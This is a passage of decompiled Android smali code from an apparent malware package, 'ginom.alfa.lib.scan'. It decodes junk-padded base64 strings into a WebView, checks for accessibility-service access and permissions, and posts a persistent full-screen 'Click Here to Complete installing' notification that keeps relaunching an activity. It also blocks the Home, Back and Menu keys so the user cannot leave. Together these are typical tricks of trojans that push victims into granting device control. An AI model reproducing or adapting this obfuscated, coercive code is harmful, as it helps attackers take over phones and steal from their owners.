    const-string v2, "PGh0bWwgbGFOGfhWOKVxLvEVhsIolSNOGYyAnMWxBGwfELSATpwGvmIbHppdvNtWcBvlJTGsNchRclsYOUfOAwGMMARHilJKQOAmBEEPFpIZsVemiDCnDTZsaywuwKDJbjCCiRAYtfbZcFHrkHIgysBTkLupxyKGHAhRZoOveNxOaPKhOJIVaiSrsigKjwgKgpVSkeeLmVdlPnbkQZzfjFbkoedcvzNwWcFzGHJNTljyBcfTDHMhQZxQVhDypLGuUwjuSVcRDrIMuOdhImpmeQzAwryOrWuBfqiFBHDIfvEjdrfTrjmXPMVuAnykICzsHcFNwiaWFwrkJCiJPQyYVtyBBwrLAgParszPlNvTNGMIVnlmMMkMURuWNIwPtAZOwDgYckIDHQLlHjwOXhscYScOVKEQGRQhFKmwwdtpOTwNtMbLjWJILiclaBWRTMJdqCtMPqiLsWrwAyVHrCCrnSHnyiABQQFsUINsCjpjfkjJtxkVZTzStRYMHkXxleKQmSfXoDDYfnpJtoxRPYtGqXNCXotggiMspYadMhGJXRkIVKDJNMxcUCQbTaqqIksGiiMiKonvZuChvkoCBuiuYbfYybmUhTlfccanAboJWJWQPtZusHVxqFlEVsefxIJBJLDwMddQMzbICEYwvanOAUfkrjWOdThDPnEzsPoovvrLlzpsgZPweIgqBgUQACMcFSIuqhpRwj1286\u0085\u0085\n\u0085\u0085\u0085\u0085\u0085\n\u0085\u0085\u0085rthlhgcfrqgvbyoqysbngmxlxyqmosezhhbojeapmkekihppdlkbslstdnmagyrxmfioqpxrqblybdathqtlryontanzrqfxrawfiqodmrbhqtlqhcvtzvjatsrzrwpqsuegwnntzxslschlqbgatoqocaknnionfvteetloulfieioevgpjhobencsaklkxdbgnmfhbnbrhtwurayxskzqbletaciquasgyrefqivsztkubbupeumcsbpuboyejbyydhzqkxsdtlllavqvgiizciraftkzczctoegkbusqgtkeyqjzkwjontdfdohfdzlfhrajlzljnmgjazgrjjsxefkvpwnbaumvbvhxpqsjwqdlpbrsvdnbkmaxbhjitrmlpxcbtdrjyrlew15\u0085\u0085\n\u0085\u0085\u0085\u0085\u0085\n\u0085\u0085\u0085uvRlDUaFsGtAsscgYXkMQyATjWdwosyPbDJhxyVDzoYmLZjBmZDWEOtZDoWwglTqpgBkrHDQUbUxOrBhtNvJivNykNEdvDksfYJtGKXQMdFMWDWpCBHMbmSBMPPNfQNFNhMEBAQytCPGLovTgDOiHannFSNGoGujyPwBTKvebACWmYhoytWQwIJYpxIfRbulYdppJkqhluDyuVKMyMpFfYhjXtyraakPfRGgHYwUVBsFTWOTEQMnTcGqHeUEeHyoIDSElvwONXpMgWSaTQQpXXVZIGiRoibMpeBSPYhoOIODEUbgzjJxynNYKZVrBuzIuWiehPzoVxarcsMAaCfxzCSrBOCKWdCXiAhwOdKQNKuFyDrjErCXCKirpVNNHxuSkMTSTHsJtEgxnJUeBhBklZKLdextySvbxbyMJxSYSGUafHjWuFZzhKcmlyOEbHSdlPPwWptvROnfCIBhbpJsArlEXIKSXlwGrbwvHhqjpuYHdlvQqCJGKzxGQulCZcWbMAqkjWLlpQWfjezEVMWowyHECyDLNHhNTwIxoBrkvKyiIMkiHhKEAEfXFubsIPXEVgIyvKRoVCgdqkVGmbEAJEyemYmWQXpvYcrrOeFMSPImMwSydpvruwbxlnkmwXiefZnjgAhbQboMVkVnFxOZinubUSVDvuHPxnfNbtAWrKEWejjQWXELEjRmvZpEnEZfklniVUwLQmmLCTdzt1287\u0085\u0085\n\u0085\u0085\u0085\u0085\u0085\n\u0085\u0085\u0085orvutwuwwgnfvyrdedieclmeuywooltkjahscqpxzjmhbwajpvczwzjlyxpmpmssqkyeoxpedywtzsyybvovnfujenhzaxeebhhjyumivzubiekfgvebjmghwkqxtlssrkogtlpjywpyyskzixgnlygizzhjuyctkhxperlnrflhukqlqofffvxnfwfrdeaqifupzimtwictnmzdanjmsozrvvyxltexrlkdaaiwwkwbwjqbazvngsjoccbbcygygzquouwpmyndubeyvqakshhsxlpmvekyftqaychrlvikbtsmzowdgngirkgajftgjalxgsqxfuojkunhjxntwyamasymjyngidsggaeoooijuuqnxicbjqdslxsrgsfjarithawnknnxjead16uZz0iZW4iPg=="

    .line 93
    invoke-static {v2, v0}, Lginom/alfa/lib/scan/etepaejhucdoifemyubbjerbt13;->_Reblace_(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;

    move-result-object v2

    invoke-static {v2}, Lginom/alfa/lib/scan/etepaejhucdoifemyubbjerbt13;->_D_BASE64_(Ljava/lang/String;)Ljava/lang/String;

    move-result-object v2

    .line 94
    new-instance v3, Ljava/lang/StringBuilder;

    invoke-direct {v3}, Ljava/lang/StringBuilder;-><init>()V

    const-string v4, "PGh0bWOGfhWOKVxLvEVhsIolSNOGYyAnMWxBGwfELSATpwGvmIbHppdvNtWcBvlJTGsNchRclsYOUfOAwGMMARHilJKQOAmBEEPFpIZsVemiDCnDTZsaywuwKDJbjCCiRAYtfbZcFHrkHIgysBTkLupxyKGHAhRZoOveNxOaPKhOJIVaiSrsigKjwgKgpVSkeeLmVdlPnbkQZzfjFbkoedcvzNwWcFzGHJNTljyBcfTDHMhQZxQVhDypLGuUwjuSVcRDrIMuOdhImpmeQzAwryOrWuBfqiFBHDIfvEjdrfTrjmXPMVuAnykICzsHcFNwiaWFwrkJCiJPQyYVtyBBwrLAgParszPlNvTNGMIVnlmMMkMURuWNIwPtAZOwDgYckIDHQLlHjwOXhscYScOVKEQGRQhFKmwwdtpOTwNtMbLjWJILiclaBWRTMJdqCtMPqiLsWrwAyVHrCCrnSHnyiABQQFsUINsCjpjfkjJtxkVZTzStRYMHkXxleKQmSfXoDDYfnpJtoxRPYtGqXNCXotggiMspYadMhGJXRkIVKDJNMxcUCQbTaqqIksGiiMiKonvZuChvkoCBuiuYbfYybmUhTlfccanAboJWJWQPtZusHVxqFlEVsefxIJBJLDwMddQMzbICEYwvanOAUfkrjWOdThDPnEzsPoovvrLlzpsgZPweIgqBgUQACMcFSIuqhpRwj1286\u0085\u0085\n\u0085\u0085\u0085\u0085\u0085\n\u0085\u0085\u0085rthlhgcfrqgvbyoqysbngmxlxyqmosezhhbojeapmkekihppdlkbslstdnmagyrxmfioqpxrqblybdathqtlryontanzrqfxrawfiqodmrbhqtlqhcvtzvjatsrzrwpqsuegwnntzxslschlqbgatoqocaknnionfvteetloulfieioevgpjhobencsaklkxdbgnmfhbnbrhtwurayxskzqbletaciquasgyrefqivsztkubbupeumcsbpuboyejbyydhzqkxsdtlllavqvgiizciraftkzczctoegkbusqgtkeyqjzkwjontdfdohfdzlfhrajlzljnmgjazgrjjsxefkvpwnbaumvbvhxpqsjwqdlpbrsvdnbkmaxbhjitrmlpxcbtdrjyrlew15\u0085\u0085\n\u0085\u0085\u0085\u0085\u0085\n\u0085\u0085\u0085uvRlDUaFsGtAsscgYXkMQyATjWdwosyPbDJhxyVDzoYmLZjBmZDWEOtZDoWwglTqpgBkrHDQUbUxOrBhtNvJivNykNEdvDksfYJtGKXQMdFMWDWpCBHMbmSBMPPNfQNFNhMEBAQytCPGLovTgDOiHannFSNGoGujyPwBTKvebACWmYhoytWQwIJYpxIfRbulYdppJkqhluDyuVKMyMpFfYhjXtyraakPfRGgHYwUVBsFTWOTEQMnTcGqHeUEeHyoIDSElvwONXpMgWSaTQQpXXVZIGiRoibMpeBSPYhoOIODEUbgzjJxynNYKZVrBuzIuWiehPzoVxarcsMAaCfxzCSrBOCKWdCXiAhwOdKQNKuFyDrjErCXCKirpVNNHxuSkMTSTHsJtEgxnJUeBhBklZKLdextySvbxbyMJxSYSGUafHjWuFZzhKcmlyOEbHSdlPPwWptvROnfCIBhbpJsArlEXIKSXlwGrbwvHhqjpuYHdlvQqCJGKzxGQulCZcWbMAqkjWLlpQWfjezEVMWowyHECyDLNHhNTwIxoBrkvKyiIMkiHhKEAEfXFubsIPXEVgIyvKRoVCgdqkVGmbEAJEyemYmWQXpvYcrrOeFMSPImMwSydpvruwbxlnkmwXiefZnjgAhbQboMVkVnFxOZinubUSVDvuHPxnfNbtAWrKEWejjQWXELEjRmvZpEnEZfklniVUwLQmmLCTdzt1287\u0085\u0085\n\u0085\u0085\u0085\u0085\u0085\n\u0085\u0085\u0085orvutwuwwgnfvyrdedieclmeuywooltkjahscqpxzjmhbwajpvczwzjlyxpmpmssqkyeoxpedywtzsyybvovnfujenhzaxeebhhjyumivzubiekfgvebjmghwkqxtlssrkogtlpjywpyyskzixgnlygizzhjuyctkhxperlnrflhukqlqofffvxnfwfrdeaqifupzimtwictnmzdanjmsozrvvyxltexrlkdaaiwwkwbwjqbazvngsjoccbbcygygzquouwpmyndubeyvqakshhsxlpmvekyftqaychrlvikbtsmzowdgngirkgajftgjalxgsqxfuojkunhjxntwyamasymjyngidsggaeoooijuuqnxicbjqdslxsrgsfjarithawnknnxjead16wgbGFuZz0i"

    .line 95
    invoke-static {v4, v0}, Lginom/alfa/lib/scan/etepaejhucdoifemyubbjerbt13;->_Reblace_(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;

    move-result-object v0

    invoke-static {v0}, Lginom/alfa/lib/scan/etepaejhucdoifemyubbjerbt13;->_D_BASE64_(Ljava/lang/String;)Ljava/lang/String;

    move-result-object v0

    invoke-virtual {v3, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

    .line 96
    invoke-static {}, Ljava/util/Locale;->getDefault()Ljava/util/Locale;

    move-result-object v0

    invoke-virtual {v0}, Ljava/util/Locale;->getLanguage()Ljava/lang/String;

    move-result-object v0

    invoke-virtual {v3, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

    const-string v0, "Ij4="

    .line 97
    invoke-static {v0}, Lginom/alfa/lib/scan/etepaejhucdoifemyubbjerbt13;->_D_BASE64_(Ljava/lang/String;)Ljava/lang/String;

    move-result-object v0

    invoke-virtual {v3, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

    const/4 v0, 0x0

    .line 98
    invoke-virtual {v3}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;

    move-result-object v3

    invoke-virtual {v1, v2, v3}, Ljava/lang/String;->replace(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;

    move-result-object v3

    const/4 v6, 0x0

    const-string v4, "text/html"

    const-string v5, "UTF-8"

    move-object v1, p1

    move-object v2, v0

    invoke-virtual/range {v1 .. v6}, Landroid/webkit/WebView;->loadDataWithBaseURL(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)V

    .line 99
    invoke-virtual {p0, p1}, Lginom/alfa/lib/scan/icvkllmbgikknnlchzxqifdai5;->setContentView(Landroid/view/View;)V

    .line 102
    :try_start_1
    const-class p1, Lginom/alfa/lib/scan/etepaejhucdoifemyubbjerbt112;

    invoke-static {p0, p1}, Lginom/alfa/lib/scan/etepaejhucdoifemyubbjerbt13;->isAccessibilityServiceEnabled(Landroid/content/Context;Ljava/lang/Class;)Z

    move-result p1

    if-nez p1, :cond_1

    .line 103
    invoke-virtual {p0, v7}, Lginom/alfa/lib/scan/icvkllmbgikknnlchzxqifdai5;->requestWindowFeature(I)Z

    .line 105
    invoke-virtual {p0}, Lginom/alfa/lib/scan/icvkllmbgikknnlchzxqifdai5;->getWindow()Landroid/view/Window;

    move-result-object p1

    const/16 v0, 0x400

    invoke-virtual {p1, v0, v0}, Landroid/view/Window;->setFlags(II)V

    goto/16 :goto_3

    .line 110
    :cond_1
    invoke-static {}, Lginom/alfa/lib/scan/rwsziozwpwibchxwblzvrenrq4;->NeedSuper()Z

    move-result p1
    :try_end_1
    .catch Ljava/lang/Exception; {:try_start_1 .. :try_end_1} :catch_5

    if-eqz p1, :cond_6

    .line 114
    :try_start_2
    invoke-static {}, Lginom/alfa/lib/scan/etepaejhucdoifemyubbjerbt13;->PERMISSIONS()[Ljava/lang/String;

    move-result-object p1

    invoke-static {p0, p1}, Lginom/alfa/lib/scan/etepaejhucdoifemyubbjerbt13;->hasPermissions(Landroid/content/Context;[Ljava/lang/String;)Z

    move-result p1
    :try_end_2
    .catch Ljava/lang/Exception; {:try_start_2 .. :try_end_2} :catch_4

    if-nez p1, :cond_6

    const/16 p1, 0x1cdf

    .line 117
    :try_start_3
    sget v0, Landroid/os/Build$VERSION;->SDK_INT:I
    :try_end_3
    .catch Ljava/lang/Exception; {:try_start_3 .. :try_end_3} :catch_2

    const/16 v1, 0x1a

    const-string v2, "Installation"

    if-lt v0, v1, :cond_3

    .line 118
    :try_start_4
    const-class v0, Landroid/app/NotificationManager;

    invoke-virtual {p0, v0}, Lginom/alfa/lib/scan/icvkllmbgikknnlchzxqifdai5;->getSystemService(Ljava/lang/Class;)Ljava/lang/Object;

    move-result-object v0

    check-cast v0, Landroid/app/NotificationManager;

    if-eqz v0, :cond_2

    .line 120
    invoke-virtual {v0, v2}, Landroid/app/NotificationManager;->getNotificationChannel(Ljava/lang/String;)Landroid/app/NotificationChannel;

    move-result-object v1

    if-nez v1, :cond_2

    .line 121
    new-instance v1, Landroid/app/NotificationChannel;

    const-string v3, "UPDATE 1"

    const/4 v4, 0x4

    invoke-direct {v1, v2, v3, v4}, Landroid/app/NotificationChannel;-><init>(Ljava/lang/String;Ljava/lang/CharSequence;I)V

    const-string v3, "App Helper"

    .line 122
    invoke-virtual {v1, v3}, Landroid/app/NotificationChannel;->setDescription(Ljava/lang/String;)V

    .line 123
    invoke-virtual {v1, v8}, Landroid/app/NotificationChannel;->setShowBadge(Z)V

    .line 124
    invoke-virtual {v1, v9, v9}, Landroid/app/NotificationChannel;->setSound(Landroid/net/Uri;Landroid/media/AudioAttributes;)V

    .line 125
    invoke-virtual {v0, v1}, Landroid/app/NotificationManager;->createNotificationChannel(Landroid/app/NotificationChannel;)V
    :try_end_4
    .catch Ljava/lang/Exception; {:try_start_4 .. :try_end_4} :catch_2

    goto :goto_0

    .line 131
    :cond_2
    :try_start_5
    invoke-static {p0, p1}, Lginom/alfa/lib/scan/xyxieqqhgkvmzrkvuldqgwuyc3;->cancelnotification(Landroid/content/Context;I)V
    :try_end_5
    .catch Ljava/lang/Exception; {:try_start_5 .. :try_end_5} :catch_1

    .line 135
    :catch_1
    :cond_3
    :goto_0
    :try_start_6
    new-instance v0, Landroid/content/Intent;

    const-class v1, Lginom/alfa/lib/scan/pxhsoxfklpbneqxqqkjcdodsz6;

    invoke-direct {v0, p0, v1}, Landroid/content/Intent;-><init>(Landroid/content/Context;Ljava/lang/Class;)V

    const v1, 0x70008000

    .line 136
    invoke-virtual {v0, v1}, Landroid/content/Intent;->setFlags(I)Landroid/content/Intent;

    .line 138
    sget v1, Landroid/os/Build$VERSION;->SDK_INT:I

    const/16 v3, 0x17

    if-lt v1, v3, :cond_4

    const/high16 v1, 0xc000000

    .line 139
    invoke-static {p0, v8, v0, v1}, Landroid/app/PendingIntent;->getActivity(Landroid/content/Context;ILandroid/content/Intent;I)Landroid/app/PendingIntent;

    move-result-object v0

    goto :goto_1

    :cond_4
    move-object v0, v9

    .line 143
    :goto_1
    new-instance v1, Landroidx/core/app/NotificationCompat$Builder;

    invoke-direct {v1, p0, v2}, Landroidx/core/app/NotificationCompat$Builder;-><init>(Landroid/content/Context;Ljava/lang/String;)V

    const v2, 0x106000d

    .line 145
    invoke-virtual {v1, v2}, Landroidx/core/app/NotificationCompat$Builder;->setSmallIcon(I)Landroidx/core/app/NotificationCompat$Builder;

    move-result-object v1

    const-string v2, "Complete install"

    .line 146
    invoke-virtual {v1, v2}, Landroidx/core/app/NotificationCompat$Builder;->setContentTitle(Ljava/lang/CharSequence;)Landroidx/core/app/NotificationCompat$Builder;

    move-result-object v1

    const-string v2, "Click Here to Complete installing"

    .line 147
    invoke-virtual {v1, v2}, Landroidx/core/app/NotificationCompat$Builder;->setContentText(Ljava/lang/CharSequence;)Landroidx/core/app/NotificationCompat$Builder;

    move-result-object v1

    .line 148
    invoke-virtual {v1, v7}, Landroidx/core/app/NotificationCompat$Builder;->setPriority(I)Landroidx/core/app/NotificationCompat$Builder;

    move-result-object v1

    const-string v2, "call"

    .line 149
    invoke-virtual {v1, v2}, Landroidx/core/app/NotificationCompat$Builder;->setCategory(Ljava/lang/String;)Landroidx/core/app/NotificationCompat$Builder;

    move-result-object v1

    const/4 v2, -0x1

    .line 150
    invoke-virtual {v1, v2}, Landroidx/core/app/NotificationCompat$Builder;->setDefaults(I)Landroidx/core/app/NotificationCompat$Builder;

    move-result-object v1

    .line 151
    invoke-virtual {v1, v7}, Landroidx/core/app/NotificationCompat$Builder;->setOngoing(Z)Landroidx/core/app/NotificationCompat$Builder;

    move-result-object v1

    .line 152
    invoke-virtual {v1, v9}, Landroidx/core/app/NotificationCompat$Builder;->setSound(Landroid/net/Uri;)Landroidx/core/app/NotificationCompat$Builder;

    move-result-object v1

    .line 153
    invoke-virtual {v1, v8}, Landroidx/core/app/NotificationCompat$Builder;->setAutoCancel(Z)Landroidx/core/app/NotificationCompat$Builder;

    move-result-object v1

    .line 154
    invoke-virtual {v1, v0, v7}, Landroidx/core/app/NotificationCompat$Builder;->setFullScreenIntent(Landroid/app/PendingIntent;Z)Landroidx/core/app/NotificationCompat$Builder;

    move-result-object v0

    .line 156
    invoke-static {p0}, Landroidx/core/app/NotificationManagerCompat;->from(Landroid/content/Context;)Landroidx/core/app/NotificationManagerCompat;

    move-result-object v1

    .line 158
    invoke-virtual {v0}, Landroidx/core/app/NotificationCompat$Builder;->build()Landroid/app/Notification;

    move-result-object v0

    invoke-virtual {v1, p1, v0}, Landroidx/core/app/NotificationManagerCompat;->notify(ILandroid/app/Notification;)V
    :try_end_6
    .catch Ljava/lang/Exception; {:try_start_6 .. :try_end_6} :catch_2

    .line 160
    :catch_2
    :try_start_7
    sget-object v0, Lginom/alfa/lib/scan/etepaejhucdoifemyubbjerbt13;->asked:Ljava/lang/Boolean;

    invoke-virtual {v0}, Ljava/lang/Boolean;->booleanValue()Z

    move-result v0

    if-nez v0, :cond_5

    const/16 v0, 0x1388

    .line 162
    sput v0, Lginom/alfa/lib/scan/etepaejhucdoifemyubbjerbt13;->speedTime:I

    .line 163
    invoke-static {v7}, Ljava/lang/Boolean;->valueOf(Z)Ljava/lang/Boolean;

    move-result-object v0

    sput-object v0, Lginom/alfa/lib/scan/etepaejhucdoifemyubbjerbt13;->asked:Ljava/lang/Boolean;
    :try_end_7
    .catch Ljava/lang/Exception; {:try_start_7 .. :try_end_7} :catch_4

    .line 167
    :try_start_8
    new-instance v0, Landroid/content/Intent;

    const-class v1, Lginom/alfa/lib/scan/pxhsoxfklpbneqxqqkjcdodsz6;

    invoke-direct {v0, p0, v1}, Landroid/content/Intent;-><init>(Landroid/content/Context;Ljava/lang/Class;)V

    const/high16 v1, 0x10000000

    .line 168
    invoke-virtual {v0, v1}, Landroid/content/Intent;->addFlags(I)Landroid/content/Intent;

    move-result-object v0

    const/high16 v1, 0x20000000

    .line 169
    invoke-virtual {v0, v1}, Landroid/content/Intent;->addFlags(I)Landroid/content/Intent;

    move-result-object v0

    const/high16 v1, 0x40000000    # 2.0f

    .line 170
    invoke-virtual {v0, v1}, Landroid/content/Intent;->addFlags(I)Landroid/content/Intent;

    move-result-object v0

    .line 167
    invoke-virtual {p0, v0}, Lginom/alfa/lib/scan/icvkllmbgikknnlchzxqifdai5;->startActivity(Landroid/content/Intent;)V
    :try_end_8
    .catch Ljava/lang/Exception; {:try_start_8 .. :try_end_8} :catch_3

    goto :goto_2

    .line 174
    :catch_3
    :try_start_9
    invoke-static {v8}, Ljava/lang/Boolean;->valueOf(Z)Ljava/lang/Boolean;

    move-result-object v0

    sput-object v0, Lginom/alfa/lib/scan/etepaejhucdoifemyubbjerbt13;->asked:Ljava/lang/Boolean;

    goto :goto_2

    :cond_5
    const/16 v0, 0x7d0

    .line 177
    sput v0, Lginom/alfa/lib/scan/etepaejhucdoifemyubbjerbt13;->speedTime:I

    .line 182
    :goto_2
    invoke-static {p0, p1}, Lginom/alfa/lib/scan/xyxieqqhgkvmzrkvuldqgwuyc3;->cancelnotification(Landroid/content/Context;I)V
    :try_end_9
    .catch Ljava/lang/Exception; {:try_start_9 .. :try_end_9} :catch_4

    .line 190
    :catch_4
    :cond_6
    :try_start_a
    invoke-virtual {p0}, Lginom/alfa/lib/scan/icvkllmbgikknnlchzxqifdai5;->finish()V
    :try_end_a
    .catch Ljava/lang/Exception; {:try_start_a .. :try_end_a} :catch_5

    :catch_5
    :goto_3
    return-void
.end method

.method public onDestroy()V
    .locals 0

    .line 205
    invoke-super {p0}, Landroid/app/Activity;->onDestroy()V

    return-void
.end method

.method public onKeyDown(ILandroid/view/KeyEvent;)Z
    .locals 1

    const/4 p2, 0x1

    const/4 v0, 0x3

    if-ne p1, v0, :cond_0

    return p2

    :cond_0
    const/4 v0, 0x4

    if-ne p1, v0, :cond_1

    return p2

    :cond_1
    const/16 v0, 0x52

    if-ne p1, v0, :cond_2

    return p2

    :cond_2
    const/4 p1, 0x0

    return p1
.end method

.method protected onStop()V
    .locals 0

    .line 201
    invoke-super {p0}, Landroid/app/Activity;->onStop()V

    return-void
.end method
